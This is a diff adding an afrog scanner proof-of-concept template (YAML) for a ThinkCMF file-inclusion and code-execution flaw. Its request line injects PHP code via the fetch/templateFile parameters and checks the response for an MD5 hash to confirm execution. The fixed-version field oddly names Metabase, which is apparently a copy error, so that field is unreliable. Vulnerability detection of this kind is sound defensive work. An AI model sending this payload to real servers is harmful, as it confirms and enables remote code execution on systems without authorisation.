■ ■ ■ ■ ■ ■
pocs/temp/afrog-pocs/vulnerability/thinkcmf-file-include.yaml
| 1 | + | id: thinkcmf-file-include |
| 2 | + | |
| 3 | + | info: |
| 4 | + | name: thinkCMF 文件包含 |
| 5 | + | author: rain |
| 6 | + | severity: Critical |
| 7 | + | description: | |
| 8 | + | 在受影响的版本中,可通过漏洞实现任意文件写入或任意代码执行 |
| 9 | + | 影响版本: |
| 10 | + | thinkCMFX 1.6.0-2.2.3 |
| 11 | + | 修复版本: |
| 12 | + | metabase version >= 0.40.5 |
| 13 | + | metabase version >= 1.40.5 |
| 14 | + | reference: |
| 15 | + | - https://www.thinkcmf.com/ |
| 16 | + | |
| 17 | + | rules: |
| 18 | + | r0: |
| 19 | + | request: |
| 20 | + | method: GET |
| 21 | + | path: /?a=fetch&templateFile=public/index&prefix="&content=die(@md5(thinkcmf)) |
| 22 | + | headers: |
| 23 | + | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 |
| 24 | + | expression: response.status == 200 && "3bedf9f6e16de1cb5403356aaa7bec38".bmatches(response.body) |
| 25 | + | expression: r0() |